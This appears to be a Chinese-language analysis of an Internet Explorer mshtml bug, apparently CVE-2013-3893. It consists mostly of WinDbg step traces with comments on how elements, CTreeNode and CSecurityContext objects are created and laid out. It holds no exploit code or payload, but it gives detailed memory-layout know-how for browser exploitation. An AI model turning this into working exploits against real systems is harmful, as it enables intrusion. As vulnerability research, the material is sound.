eip=6a23481e esp=0425e628 ebp=0425e634 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0xf:
6a23481e e80c300800 call mshtml!CBase::CBase (6a2b782f)
:>
eax=1af02fd8 ebx=05ad0680 ecx=6a6251a0 edx= esi=1af02fd8 edi=1af02fd8
eip=6a234823 esp=0425e628 ebp=0425e634 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x14:
6a234823 and dword ptr [edi+24h], ds::1af02ffc=
:>
eax=1af02fd8 ebx=05ad0680 ecx=6a6251a0 edx= esi=1af02fd8 edi=1af02fd8
eip=6a234827 esp=0425e628 ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x18:
6a234827 c707b0540f6a mov dword ptr [edi],offset mshtml!CElement::`vftable' (6a0f54b0) ds:0023:1af02fd8={mshtml!CEncode::`vftable' (6a2b785c)}
:>
eax=1af02fd8 ebx=05ad0680 ecx=6a6251a0 edx= esi=1af02fd8 edi=1af02fd8
eip=6a23482d esp=0425e628 ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x1e:
6a23482d 8b03 mov eax,dword ptr [ebx] ds::05ad0680={mshtml!CDoc::`vftable' (6a2a1e88)}
:>
eax=6a2a1e88 ebx=05ad0680 ecx=6a6251a0 edx= esi=1af02fd8 edi=1af02fd8
eip=6a23482f esp=0425e628 ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x20:
6a23482f 8bcb mov ecx,ebx
:>
eax=6a2a1e88 ebx=05ad0680 ecx=05ad0680 edx= esi=1af02fd8 edi=1af02fd8
eip=6a234831 esp=0425e628 ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x22:
6a234831 ff5070 call dword ptr [eax+70h] ds::6a2a1ef8={mshtml!CDoc::SecurityContext (6a234733)}
:>
eax=074befe8 ebx=05ad0680 ecx=05ad0680 edx= esi=1af02fd8 edi=1af02fd8
eip=6a234834 esp=0425e628 ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x25:
6a234834 8bf0 mov esi,eax
:>
eax=074befe8 ebx=05ad0680 ecx=05ad0680 edx= esi=074befe8 edi=1af02fd8
eip=6a234836 esp=0425e628 ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x27:
6a234836 e828000000 call mshtml!CElement::ReplaceSecurityContext (6a234863)
:>
eax= ebx=05ad0680 ecx=6a2a92e1 edx= esi=074befe8 edi=1af02fd8
eip=6a23483b esp=0425e628 ebp=0425e634 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x2c:
6a23483b add dword ptr [ebx+], ds::05ad0688=000000a0
:>
eax= ebx=05ad0680 ecx=6a2a92e1 edx= esi=074befe8 edi=1af02fd8
eip=6a23483f esp=0425e628 ebp=0425e634 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x30:
6a23483f e8123d0800 call mshtml!_IncrementObjectCount (6a2b8556)
:>
eax=0000003b ebx=05ad0680 ecx=6a6251a0 edx= esi=074befe8 edi=1af02fd8
eip=6a234844 esp=0425e628 ebp=0425e634 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x35:
6a234844 8a4508 mov al,byte ptr [ebp+] ss::0425e63c=
:>
eax= ebx=05ad0680 ecx=6a6251a0 edx= esi=074befe8 edi=1af02fd8
eip=6a234847 esp=0425e628 ebp=0425e634 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x38:
6a234847 81671cfffffbff and dword ptr [edi+1Ch],0FFFBFFFFh ds::1af02ff4=
:>
eax= ebx=05ad0680 ecx=6a6251a0 edx= esi=074befe8 edi=1af02fd8
eip=6a23484e esp=0425e628 ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x3f:
6a23484e 806720fe and byte ptr [edi+20h],0FEh ds::1af02ff8=
:>
eax= ebx=05ad0680 ecx=6a6251a0 edx= esi=074befe8 edi=1af02fd8
eip=6a234852 esp=0425e628 ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x43:
6a234852 mov byte ptr [edi+18h],al ds::1af02ff0=
:>
eax= ebx=05ad0680 ecx=6a6251a0 edx= esi=074befe8 edi=1af02fd8
eip=6a234855 esp=0425e628 ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x46:
6a234855 8bc7 mov eax,edi
:>
eax=1af02fd8 ebx=05ad0680 ecx=6a6251a0 edx= esi=074befe8 edi=1af02fd8
eip=6a234857 esp=0425e628 ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x48:
6a234857 5f pop edi
:>
eax=1af02fd8 ebx=05ad0680 ecx=6a6251a0 edx= esi=074befe8 edi=
eip=6a234858 esp=0425e62c ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x49:
6a234858 5e pop esi
:> dd eax
1af02fd8 6a0f54b0
1af02fe8
1af02ff8 074befe8 ???????? ????????
1af03008 ???????? ???????? ???????? ????????
1af03018 ???????? ???????? ???????? ????????
1af03028 ???????? ???????? ???????? ????????
1af03038 ???????? ???????? ???????? ????????
1af03048 ???????? ???????? ???????? ????????
:> ln 6a0f54b0
(6a0f54b0) mshtml!CElement::`vftable' | (6a1008c0) mshtml!CShape::`vftable'
Exact matches:
mshtml!CElement::`vftable' = <no type information>
:> dd 074befe8
074befe8 6a2a8c34 05ad0680
074beff8 ???????? ????????
074bf008 ???????? ???????? ???????? ????????
074bf018 ???????? ???????? ???????? ????????
074bf028 ???????? ???????? ???????? ????????
074bf038 ???????? ???????? ???????? ????????
074bf048 ???????? ???????? ???????? ????????
074bf058 ???????? ???????? ???????? ????????
:> ln 6a2a8c34
(6a2a8c34) mshtml!CSecurityContext::`vftable' | (6a2a8c44) mshtml!CInvalidatedSecurityContext::`vftable'
Exact matches:
mshtml!CSecurityContext::`vftable' = <no type information>

可以看到CPhraseElement对象被初始化后的结果,有意思的是对象的0x28偏移处有个CSecurityContext对象的指针。

:> g
Breakpoint hit
eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bb0 esp=0425e67c ebp=0425e718 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement:
6a234bb0 8bff mov edi,edi
:> p
eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bb2 esp=0425e67c ebp=0425e718 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x2:
6a234bb2 push ebp
:>
eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bb3 esp=0425e678 ebp=0425e718 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x3:
6a234bb3 8bec mov ebp,esp
:>
eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bb5 esp=0425e678 ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x5:
6a234bb5 83ec10 sub esp,10h
:>
eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bb8 esp=0425e668 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x8:
6a234bb8 push ebx
:>
eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bb9 esp=0425e664 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x9:
6a234bb9 8b5d10 mov ebx,dword ptr [ebp+10h] ss::0425e688=
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bbc esp=0425e664 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0xc:
6a234bbc push esi
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bbd esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0xd:
6a234bbd c7451000000000 mov dword ptr [ebp+10h], ss::0425e688=
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bc4 esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x14:
6a234bc4 85db test ebx,ebx
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bc6 esp=0425e660 ebp=0425e678 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x16:
6a234bc6 0f84c67d0300 je mshtml!CreateElement+0x18 (6a26c992) [br=]
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a26c992 esp=0425e660 ebp=0425e678 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x18:
6a26c992 bb08832a6a mov ebx,offset mshtml!g_Zero (6a2a8308)
:>
eax=0425e750 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a26c997 esp=0425e660 ebp=0425e678 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x1d:
6a26c997 e93082fcff jmp mshtml!CreateElement+0x1d (6a234bcc)
:>
eax=0425e750 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bcc esp=0425e660 ebp=0425e678 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x1d:
6a234bcc 0fb64701 movzx eax,byte ptr [edi+] ds::0425e6a9=
:>
eax= ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bd0 esp=0425e660 ebp=0425e678 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x21:
6a234bd0 c1e004 shl eax,
:>
eax= ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bd3 esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x24:
6a234bd3 05709a2c6a add eax,offset mshtml!g_atagdesc (6a2c9a70)
:>
eax=6a2ca1c0 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bd8 esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x29:
6a234bd8 0f84b34e1500 je mshtml!CreateElement+0x2b (6a389a91) [br=]:> p
eax=6a2ca1c0 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bde esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x38:
6a234bde 8b4008 mov eax,dword ptr [eax+] ds::6a2ca1c8={mshtml!CGenericElement::CreateElement (6a11c234)}
:>
eax=6a11c234 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234be1 esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x3b:
6a234be1 8d4d10 lea ecx,[ebp+10h]
:>
eax=6a11c234 ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi= edi=0425e6a8
eip=6a234be4 esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x3e:
6a234be4 push ecx
:>
eax=6a11c234 ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi= edi=0425e6a8
eip=6a234be5 esp=0425e65c ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x3f:
6a234be5 push edx
:>
eax=6a11c234 ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi= edi=0425e6a8
eip=6a234be6 esp=0425e658 ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x40:
6a234be6 push edi
:>
eax=6a11c234 ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi= edi=0425e6a8
eip=6a234be7 esp=0425e654 ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x41:
6a234be7 ffd0 call eax {mshtml!CGenericElement::CreateElement (6a11c234)}
:> ln eax
(6a11c234) mshtml!CGenericElement::CreateElement | (6a11c279) mshtml!CGenericElement::CGenericElement
Exact matches:
mshtml!CGenericElement::CreateElement = <no type information>

可见var id_1 = document.createElement("audio");导致创建了CGenericElement对象

:> g
Breakpoint hit
eax=07824fc8 ebx=07824fc8 ecx=7782349f edx= esi=0425e6a8 edi=0425e6a8
eip=6a23480f esp=0425e614 ebp=0425e638 iopl= nv up ei pl nz ac po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement:
6a23480f 8bff mov edi,edi
:> p
eax=07824fc8 ebx=07824fc8 ecx=7782349f edx= esi=0425e6a8 edi=0425e6a8
eip=6a234811 esp=0425e614 ebp=0425e638 iopl= nv up ei pl nz ac po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x2:
6a234811 push ebp
:>
eax=07824fc8 ebx=07824fc8 ecx=7782349f edx= esi=0425e6a8 edi=0425e6a8
eip=6a234812 esp=0425e610 ebp=0425e638 iopl= nv up ei pl nz ac po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x3:
6a234812 8bec mov ebp,esp
:> dd eax
07824fc8
07824fd8
07824fe8
07824ff8 ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????

这是CGenericElement对象调用的继承自基类的构造函数,没有必要单步到返回了,因为对于继承于CElement类的子类实例来说,初始化的内容都是一样的,除了0x24偏移处表示类型的flag值。

:> g
Breakpoint hit
eax= ebx=0425e960 ecx= edx= esi=0425e950 edi=0425e950
eip=6c77d67f esp=0425e834 ebp=0425e870 iopl= nv up ei pl nz ac po nc
cs=001b ss= ds= es= fs=003b gs= efl=
jscript!cos:
6c77d67f ff259010756c jmp dword ptr [jscript!_imp__cos (6c751090)] ds::6c751090={msvcrt!cos (773d8ace)}

这个就很有意思了,注意我下的断点

:> bl
e 6c77d8c0 () :**** jscript!tan
e 6a23d88c () :**** mshtml!CreateElement
e 6a234bb0 () :**** mshtml!CreateElement
e 6c77d67f () :**** jscript!cos
e 6a1f20c4 () :**** mshtml!CElement::appendChild
e 6a2bced0 () :**** mshtml!CTreeNode::CTreeNode
e 6a23480f () :**** mshtml!CElement::CElement

一个常识就是CxxxElement对象与CTreeNode对象是有一一对应的关系的,但是在这里就可以看出创建元素未必就会创建CTreeNode

:> g
Breakpoint hit
eax=15284fd8 ebx=6a628b0c ecx=6a1f20c4 edx=0425e7f4 esi= edi=
eip=6a1f20c4 esp=0425e7c8 ebp=0425e7f8 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::appendChild:
6a1f20c4 8bff mov edi,edi
:> dd esp
0425e7c8 6a1f1436 150e3fd0 1b1dcfd8 0425e850
0425e7d8 176bafd0 6a1f13ba 6a2ae458 a9ca0dc9
0425e7e8 9bcb0009 1b1dcfd8
0425e7f8 0425e86c 6a32235c 150e3fd0 176bafd0
0425e808 15284fd8 0000004c 6a2ae458
0425e818 0425ea40 0425e848 176bafd0
0425e828 0dbb001b
0425e838 0000004c 15284fd8
:> dd 150e3fd0
150e3fd0 6a246670 07701fe8
150e3fe0 071fae80 15171fb0 8202e280
150e3ff0 104d4f00 d0d0d0d0
150e4000 ???????? ???????? ???????? ????????
150e4010 ???????? ???????? ???????? ????????
150e4020 ???????? ???????? ???????? ????????
150e4030 ???????? ???????? ???????? ????????
150e4040 ???????? ???????? ???????? ????????
:> ln 6a246670
(6a246670) mshtml!CBodyElement::`vftable' | (6a2a9108) mshtml!CCaret::`vftable'
Exact matches:
mshtml!CBodyElement::`vftable' = <no type information>
:> dd 1b1dcfd8
1b1dcfd8 6a627f68 6a2d2fa8 1af02fd8
1b1dcfe8 6a2aaadc
1b1dcff8 ???????? ????????
1b1dd008 ???????? ???????? ???????? ????????
1b1dd018 ???????? ???????? ???????? ????????
1b1dd028 ???????? ???????? ???????? ????????
1b1dd038 ???????? ???????? ???????? ????????
1b1dd048 ???????? ???????? ???????? ????????
:> ln 6a627f68
(6a627f68) mshtml!s_apfnTrackerTearoffVtable | (6a6280a0) mshtml!s_fontFamilyMap
Exact matches:
mshtml!s_apfnTrackerTearoffVtable = <no type information>

看的出CElement::appendChild函数的第一个参数就是要加入的父对象(body)

:> t
eax=150e3fd0 ebx=6a628b0c ecx= edx= esi=1b1dcfd8 edi=0425e850
eip=6a1f2170 esp=0425e76c ebp=0425e784 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::InsertBeforeHelper:
6a1f2170 8bff mov edi,edi
:> kv
ChildEBP RetAddr Args to Child
0425e768 6a1f2148 1b1dcfd8 0425e7a4 mshtml!CElement::InsertBeforeHelper
0425e784 6a1f20fe 150e3fd0 1b1dcfd8 mshtml!CElement::insertBefore+0x3c
0425e7c4 6a1f1436 150e3fd0 1b1dcfd8 0425e850 mshtml!CElement::appendChild+0x3a
0425e7f8 6a32235c 150e3fd0 176bafd0 15284fd8 mshtml!Method_IDispatchpp_IDispatchp+0xcb
0425e86c 6a32c75a 150e3fd0 mshtml!CBase::ContextInvokeEx+0x5dc
0425e8bc 6a32c79a 150e3fd0 mshtml!CElement::ContextInvokeEx+0x9d
0425e8e8 6a2d3104 150e3fd0 mshtml!CInput::VersionedInvokeEx+0x2d
0425e93c 6c75a22a 06fa2fd8 mshtml!PlainInvokeEx+0xeb
0425e978 6c75a175 1a6c4d10 jscript!IDispatchExInvokeEx2+0x104
0425e9b4 6c75a3f6 1a6c4d10 jscript!IDispatchExInvokeEx+0x6a
0425ea74 6c75a4a0 jscript!InvokeDispatchEx+0x98
0425eaa8 6c76d8c8 1a6c4d10 0425eadc jscript!VAR::InvokeByName+0x139
0425eaf4 6c76d96f 1a6c4d10 jscript!VAR::InvokeDispName+0x7d
0425eb20 6c76e3e7 1a6c4d10 jscript!VAR::InvokeByDispID+0xce

从回溯传递的参数就可以看出上几层函数其实只是简单的封装(原来的参数1由eax传递),真正的功能由CElement::InsertBeforeHelper实现

:>
eax=150e3fd0 ebx=6a628b0c ecx=150e3fd0 edx= esi=150e3fd0 edi=
eip=6a1f218d esp=0425e710 ebp=0425e768 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::InsertBeforeHelper+0x1d:
6a1f218d e86ea20b00 call mshtml!CElement::Doc (6a2ac400)

这个函数首先调用的就是CElement::Doc,只有一个ecx传递下去。

; public: class CDoc * __thiscall CElement::Doc(void)const
?Doc@CElement@@QBEPAVCDoc@@XZ proc near
mov eax, [ecx]
mov edx, [eax+70h]
call edx
mov eax, [eax+0Ch]
retn
?Doc@CElement@@QBEPAVCDoc@@XZ endp

可以看到只是简单的调用对象的一个虚函数,然后根据返回的指针取值。

:> t
eax=150e3fd0 ebx=6a628b0c ecx=150e3fd0 edx= esi=150e3fd0 edi=
eip=6a2ac400 esp=0425e70c ebp=0425e768 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::Doc:
6a2ac400 8b01 mov eax,dword ptr [ecx] ds::150e3fd0={mshtml!CBodyElement::`vftable' (6a246670)}
:>
eax=6a246670 ebx=6a628b0c ecx=150e3fd0 edx= esi=150e3fd0 edi=
eip=6a2ac402 esp=0425e70c ebp=0425e768 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::Doc+0x2:
6a2ac402 8b5070 mov edx,dword ptr [eax+70h] ds::6a2466e0={mshtml!CElement::SecurityContext (6a2ac3d0)}
:>
eax=6a246670 ebx=6a628b0c ecx=150e3fd0 edx=6a2ac3d0 esi=150e3fd0 edi=
eip=6a2ac405 esp=0425e70c ebp=0425e768 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::Doc+0x5:
6a2ac405 ffd2 call edx {mshtml!CElement::SecurityContext (6a2ac3d0)}
:> ln eax
(6a246670) mshtml!CBodyElement::`vftable' | (6a2a9108) mshtml!CCaret::`vftable'
Exact matches:
mshtml!CBodyElement::`vftable' = <no type information>

可以看到ecx还是body(父对象)

:> p
eax=18b1cfe8 ebx=6a628b0c ecx=06d62f30 edx=6a2ac916 esi=150e3fd0 edi=
eip=6a2ac407 esp=0425e70c ebp=0425e768 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::Doc+0x7:
6a2ac407 8b400c mov eax,dword ptr [eax+0Ch] ds::18b1cff4=05ad0680
:> dd eax
18b1cfe8 6a2a8c34 05ad0680
18b1cff8 06d62f30 ???????? ????????
18b1d008 ???????? ???????? ???????? ????????
18b1d018 ???????? ???????? ???????? ????????
18b1d028 ???????? ???????? ???????? ????????
18b1d038 ???????? ???????? ???????? ????????
18b1d048 ???????? ???????? ???????? ????????
18b1d058 ???????? ???????? ???????? ????????
:> ln poi(eax)
(6a2a8c34) mshtml!CSecurityContext::`vftable' | (6a2a8c44) mshtml!CInvalidatedSecurityContext::`vftable'
Exact matches:
mshtml!CSecurityContext::`vftable' = <no type information>

这是call之后的返回值,可以看出返回其实是CSecurityContext对象

:> p
eax=18b1cfe8 ebx=6a628b0c ecx=06d62f30 edx=6a2ac916 esi=150e3fd0 edi=
eip=6a2ac407 esp=0425e70c ebp=0425e768 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::Doc+0x7:
6a2ac407 8b400c mov eax,dword ptr [eax+0Ch] ds::18b1cff4=05ad0680
:> p
eax=05ad0680 ebx=6a628b0c ecx=06d62f30 edx=6a2ac916 esi=150e3fd0 edi=
eip=6a2ac40a esp=0425e70c ebp=0425e768 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::Doc+0xa:
6a2ac40a c3 ret
:> dd eax
05ad0680 6a2a1e88 000000b0
05ad0690 6a2bb610 05ad0680 054aeb8c
05ad06a0 000040a8 000021e6 054aeba8
05ad06b0 077d5f88
05ad06c0
05ad06d0 07560fc8 04ea8870
05ad06e0 13fbded8
05ad06f0 0000001d
:> ln poi(eax)
(6a2a1e88) mshtml!CDoc::`vftable' | (6a2bb610) mshtml!CDoc::`vftable'
Exact matches:
mshtml!CDoc::`vftable' = <no type information>

取CSecurityContext对象0xC偏移的值作为返回,通过求符号可以看到这个货其实是CDoc对象的指针。也就是说CElement::Doc的作用是单纯的返回mshtml!Doc的地址,Doc对象是代表html dom树总根的,就是<html></html>

:>
eax=0425e71c ebx=6a628b0c ecx=150e3fd0 edx=6a2ac916 esi=150e3fd0 edi=
eip=6a1f21a6 esp=0425e710 ebp=0425e768 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::InsertBeforeHelper+0x3c:
6a1f21a6 e8deab0b00 call mshtml!CElement::GetWindowedMarkupContext (6a2acd89)
:>
eax=06d62f30 ebx=6a628b0c ecx= edx=6a2ac8f9 esi=150e3fd0 edi=
eip=6a1f21ab esp=0425e710 ebp=0425e768 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::InsertBeforeHelper+0x41:
6a1f21ab 8bd8 mov ebx,eax
:> ln poi(eax)
(6a2a20a8) mshtml!CMarkup::`vftable' | (6a2a21a0) mshtml!CMarkupPointer::`vftable'
Exact matches:
mshtml!CMarkup::`vftable' = <no type information>

明显这个函数获取到了CMarkup对象的指针

:> r
eax= ebx=06d62f30 ecx= edx= esi=150e3fd0 edi=
eip=6a1f220a esp=0425e708 ebp=0425e768 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::InsertBeforeHelper+0xb9:
6a1f220a e831000000 call mshtml!CElement::GetDOMInsertPosition (6a1f2240)
:> ln poi(poi(esp))
(6a246670) mshtml!CBodyElement::`vftable' | (6a2a9108) mshtml!CCaret::`vftable'
Exact matches:
mshtml!CBodyElement::`vftable' = <no type information>
:> ln poi(poi(esp+))
(6a2a21a0) mshtml!CMarkupPointer::`vftable' | (6a2a2278) mshtml!CIPrintCollection::`vftable'
Exact matches:
mshtml!CMarkupPointer::`vftable' = <no type information>

以两个对象的地址作为参数

Breakpoint  hit
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi=0425e660 edi=1af02fd8
eip=6a2bced0 esp=0425e594 ebp=0425e630 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode:
6a2bced0 8bff mov edi,edi
:> kp
ChildEBP RetAddr
0425e590 6a210d02 mshtml!CTreeNode::CTreeNode
0425e630 6a1f1c01 mshtml!CMarkup::InsertElementInternal+0x23d
0425e66c 6a1f1b36 mshtml!CDoc::InsertElement+0x8a
0425e700 6a1f2222 mshtml!CCommentElement::`scalar deleting destructor'+0x23e
0425e768 6a1f2148 mshtml!CElement::InsertBeforeHelper+0xd1
0425e784 6a1f20fe mshtml!CElement::insertBefore+0x3c
0425e7c4 6a1f1436 mshtml!CElement::appendChild+0x3a
0425e7f8 6a32235c mshtml!Method_IDispatchpp_IDispatchp+0xcb
0425e86c 6a32c75a mshtml!CBase::ContextInvokeEx+0x5dc
0425e8bc 6a32c79a mshtml!CElement::ContextInvokeEx+0x9d
0425e8e8 6a2d3104 mshtml!CInput::VersionedInvokeEx+0x2d
0425e93c 6c75a22a mshtml!PlainInvokeEx+0xeb
0425e978 6c75a175 jscript!IDispatchExInvokeEx2+0x104
0425e9b4 6c75a3f6 jscript!IDispatchExInvokeEx+0x6a
0425ea74 6c75a4a0 jscript!InvokeDispatchEx+0x98
0425eaa8 6c76d8c8 jscript!VAR::InvokeByName+0x139
0425eaf4 6c76d96f jscript!VAR::InvokeDispName+0x7d
0425eb20 6c76e3e7 jscript!VAR::InvokeByDispID+0xce
0425ecbc 6c765c9d jscript!CScriptRuntime::Run+0x2b80
0425eda4 6c765bfb jscript!ScrFncObj::CallWithFrameOnStack+0xce

CVE-2013-3893-LMLPHP

只要等到这个函数CTreeNode::CTreeNode函数执行完毕就可以去看内存中初始化完毕的数据了,由于CTreeNode对象的前四个字节就是所属元素对象的指针,所以获取这个值即可

:> p
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi=0425e660 edi=1af02fd8
eip=6a2bced2 esp=0425e594 ebp=0425e630 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x2:
6a2bced2 push ebp
:>
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi=0425e660 edi=1af02fd8
eip=6a2bced3 esp=0425e590 ebp=0425e630 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x3:
6a2bced3 8bec mov ebp,esp
:>
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi=0425e660 edi=1af02fd8
eip=6a2bced5 esp=0425e590 ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x5:
6a2bced5 8a450c mov al,byte ptr [ebp+0Ch] ss::0425e59c=
:>
eax=127c7f00 ebx= ecx=127c7fb0 edx= esi=0425e660 edi=1af02fd8
eip=6a2bced8 esp=0425e590 ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
